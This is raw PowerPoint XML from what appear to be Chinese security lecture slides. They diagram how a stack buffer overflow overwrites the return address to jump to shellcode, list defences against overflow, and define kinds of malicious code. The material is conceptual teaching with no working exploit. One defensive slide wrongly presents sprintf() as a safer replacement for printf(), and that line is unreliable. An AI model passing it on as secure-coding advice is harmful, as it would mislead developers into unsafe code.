                                    </p:animMotion>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00208 0.07561 L 0.00208 0.1489 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3653"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="57" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="58" presetID="16" presetClass="exit" presetSubtype="21" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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0.00208 0.14891 L 0.00208 0.21203 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3145"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="65" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="66" presetID="2" presetClass="exit" presetSubtype="6" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="67" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="68" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="70" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="71" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="0" nodeType="after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3" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.00208 0.21203 L 0.00208 0.27492 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="81" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3145"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="82" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="83" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="84" presetID="2" presetClass="exit" presetSubtype="2" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="85" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="86" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="9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21538"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="102" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="321538"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="103" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="321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4" grpId="0" animBg="1"/>
      <p:bldP spid="4" grpId="1" animBg="1"/>
      <p:bldP spid="5" grpId="0" animBg="1"/>
      <p:bldP spid="5" grpId="1" animBg="1"/>
      <p:bldP spid="6" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="1" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>
      <p:bldP spid="12" grpId="0"/>
      <p:bldP spid="15" grpId="0"/>
      <p:bldP spid="17" grpId="0"/>
      <p:bldP spid="17" grpId="1"/>
      <p:bldP spid="17" grpId="2"/>
      <p:bldP spid="17" grpId="3"/>
      <p:bldP spid="19" grpId="0"/>
      <p:bldP spid="23" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="27" grpId="0"/>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fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>控制流程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>)+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>植入代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>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rgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6444208" y="3013834"/>
            <a:ext cx="2520280"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EBP(m)=k2???</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304"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ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>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EBP(f)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304"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ESP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6444208" y="3579703"/>
            <a:ext cx="2517452" cy="861774"/>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rPr>
              <a:t>IP = k4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>k4=addr(shellcode)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304"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ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>buffer_b</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6441380" y="2571592"/>
            <a:ext cx="2520280" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>buffer_a=k1k2k3k4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4405912" y="4797152"/>
            <a:ext cx="3262432" cy="830997"/>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smtClean="0"/>
              <a:t>控制流程和代码植入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>可在不同缓冲区中完成</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>防止缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>采用安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语言库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>函数最新版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>()——》strncpy(),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>printf()——》sprintf()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>程序员检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数组与指针</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等越界代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>允许溢出但不允许改变控制流</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>禁止未经授权控制流的改变</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>允许改变控制流但禁止敏感代码执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>禁止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击代码执行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如禁止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>诸如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>exec()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等系统调用函数的非法使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，程序使用系统调用函数时，返回地址保存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>内核堆栈，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>而不是普通</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>堆栈。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统调用的地址是否来自系统内核堆栈就可知道它是否合法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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防范缓冲区溢出攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58372" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{92B7EE74-9AC8-4A42-85BA-4B3091D68183}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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rPr>
              <a:t>恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47106" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4DF4C415-AB34-4946-9517-369604C2B25B}"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smtClean="0"/>
              <a:t>具有在信息系统上执行非授权进程能力的代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>具有各种各样形态，能够引起计算机不同程度的故障，破坏计算机正常运行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>早期恶意代码：病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Virus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目前：蠕虫(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Worm)、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>恶意网页（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>malicious web page）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>特洛伊木马（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Trojan Horse）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>逻辑炸弹（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Logic bombs）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>以及后门（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>backdoor）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等其他形式的恶意代码日益兴盛。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329730" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
